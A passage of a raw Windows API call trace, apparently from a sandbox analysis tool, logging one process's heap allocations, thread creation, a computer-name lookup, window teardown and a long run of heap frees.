Flags=0x0, Size=0x820) returned 0x344a9b8 [0226.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x344b240 [0226.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3457670 [0226.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3457ed8 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x344bac8 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x344c350 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x344cbd8 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3458740 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3458f88 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x344d460 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x344dce8 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x344e570 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x344edf8 [0226.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x344f680 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x344ff08 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3450790 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3451018 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x34518a0 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x34597d0 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x345a038 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3452128 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x34529b0 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3453238 [0226.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x345a8a0 [0226.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3453ac0 [0226.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3454348 [0226.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3454bd0 [0226.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3455458 [0226.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3455ce0 [0226.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3456568 [0226.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x345b100 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x345b988 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x345c210 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x345ca98 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x346b0e8 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x346b950 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x345d320 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x345dba8 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x345e430 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x345ecb8 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x345f540 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x345fdc8 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3460650 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3460ed8 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3461760 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a86f8 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3461fe8 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x34309d8 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x346c1b8 [0226.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x346c9d0 [0226.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x346d1e8 [0226.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3462870 [0226.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x34630f8 [0226.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3463980 [0226.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673e28 [0226.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3464208 [0226.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3464a90 [0226.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3465318 [0226.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3465ba0 [0226.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x3416ed0, dwCreationFlags=0x0, lpThreadId=0x33cf798 | out: lpThreadId=0x33cf798*=0x5b4) returned 0x5cc [0226.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x548) returned 0x5d8 [0226.668] GetMessageW (in: lpMsg=0x18e100, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e100) returned 0 [0242.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b8ccd0 [0242.936] GetComputerNameW (in: lpBuffer=0x3b8ccd0, nSize=0x18d47c | out: lpBuffer="XDUWTFONO", nSize=0x18d47c) returned 1 [0242.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0242.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0242.946] IsWindow (hWnd=0x30152) returned 1 [0242.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.663] IsWindow (hWnd=0x30152) returned 1 [0246.663] DestroyWindow (hWnd=0x30152) returned 1 [0246.663] NtdllDefWindowProc_W () returned 0x0 [0246.715] PostQuitMessage (nExitCode=0) [0246.717] NtdllDefWindowProc_W () returned 0x0 [0246.744] CloseHandle (hObject=0x5d0) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643000 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc870 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc848 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc668 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc640 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc690 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc6b8 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c14f8 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c16f0 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc7f8 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc820 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc6e0 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc7a8 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc780 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc7d0 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc9b0 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1760 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c13a8 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc9d8 | out: hHeap=0x620000) returned 1 [0246.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fca00 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fca28 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fca50 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fca78 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcaa0 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcac8 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcaf0 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1488 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1798 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcb18 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcb40 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcb68 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcb90 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcbb8 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcbe0 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcc08 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcc30 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c17d0 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1808 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcc58 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcc80 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcca8 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fccd0 | out: hHeap=0x620000) returned 1 [0246.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fccf8 | out: hHeap=0x620000) returned 1 [0246.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33db8d8 | out: hHeap=0x620000) returned 1 [0246.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692260 | out: hHeap=0x620000) returned 1 [0246.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6932a8 | out: hHeap=0x620000) returned 1 [0246.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3396e38 | out: hHeap=0x620000) returned 1 [0246.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67b190 | out: hHeap=0x620000) returned 1 [0246.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1568 | out: hHeap=0x620000) returned 1 [0246.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7950 | out: hHeap=0x620000) returned 1 [0246.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7908 | out: hHeap=0x620000) returned 1 [0246.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fc40 | out: hHeap=0x620000) returned 1 [0246.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fbf8 | out: hHeap=0x620000) returned 1 [0246.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1958 | out: hHeap=0x620000) returned 1 [0246.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0246.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0246.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x678720 | out: hHeap=0x620000) returned 1 [0246.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33cf790 | out: hHeap=0x620000) returned 1 [0246.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63e518 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343a2c8 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343ab50 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343b3d8 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343bc60 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673d58 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34391b8 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341af98 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341a780 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3419f68 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3419750 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3418f38 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3418720 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3417f08 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708a50 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341b7c0 | out: hHeap=0x620000) returned 1 [0246.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341bfe8 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341c820 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341d058 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341d890 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341e0c8 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341e910 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341f138 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x341f960 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3420a00 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3421680 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3422300 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3422b28 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3423370 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3423bb8 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34243f0 | out: hHeap=0x620000) returned 1 [0246.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3424c28 | out: hHeap=0x620000) returned 1 [0246.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3425460 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3425c88 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34264b0 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3426cd8 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3427510 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3427d48 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8608 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3428dc8 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3429a48 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8e90 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b9718 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3428570 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342a6c8 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342af10 | out: hHeap=0x620000) returned 1 [0246.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34201a8 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342b758 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342bf90 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b9fa0 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ba828 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33bb938 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342cff8 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342e068 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33bc1c0 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342e8a0 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342f520 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33bca48 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33bd2d0 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34301a0 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3431218 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34322a8 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33bdb58 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33be3e0 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33bec68 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33bb0b0 | out: hHeap=0x620000) returned 1 [0246.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34333e0 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3433c68 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33bf4f0 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3434d78 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3435600 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34433c8 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3444048 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3435e88 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3436710 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3436f98 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3431a60 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3437820 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34380a8 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3438930 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34344f0 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3439a40 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3432af0 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33db0c0 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673cf0 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33da058 | out: hHeap=0x620000) returned 1 [0246.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692a80 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e18d8 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e0fe0 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3464208 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3464a90 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3465318 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3465ba0 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673e28 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3461fe8 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34309d8 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346c1b8 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346c9d0 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346d1e8 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3462870 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34630f8 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3463980 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a86f8 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343cd70 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343d5f8 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343de80 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343e708 | out: hHeap=0x620000) returned 1 [0246.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343ef90 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340d058 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x343f818 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34400a0 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3444cc8 | out: hHeap=0x620000) returned 1 [0246.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 